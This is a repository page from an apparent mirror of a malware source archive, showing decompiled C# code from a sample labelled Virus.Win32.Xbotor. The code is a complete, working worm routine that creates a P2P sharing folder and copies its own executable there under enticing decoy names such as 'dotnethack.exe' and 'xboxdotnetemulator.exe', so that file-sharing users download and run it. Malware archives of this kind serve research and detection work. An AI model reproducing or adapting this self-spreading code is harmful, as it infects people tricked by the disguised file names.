mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
f2ac1ece55
add
35 lines
884 B
C#
35 lines
884 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: p2pdotnet
|
|
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 92129E77-F6EE-43FE-93E4-918DA5687A83
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Xbotor-45fa2a41d7300814fe94d0eb8fc1f81a9565ff1e28ba2d1973bb5cb1bac62fea.exe
|
|
|
|
using System.IO;
|
|
using System.Reflection;
|
|
|
|
internal class p2pdotnet
|
|
{
|
|
public static void Main()
|
|
{
|
|
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
|
Directory.CreateDirectory("\\P2P");
|
|
string[] strArray = new string[4]
|
|
{
|
|
"dotnethack.exe",
|
|
"xboxdotnetemulator.exe",
|
|
"linuxdotnet.exe",
|
|
"dosdotnet.exe"
|
|
};
|
|
foreach (string str in strArray)
|
|
{
|
|
try
|
|
{
|
|
File.Copy(module.FullyQualifiedName, "\\P2P\\" + str);
|
|
}
|
|
catch
|
|
{
|
|
}
|
|
}
|
|
}
|
|
}
|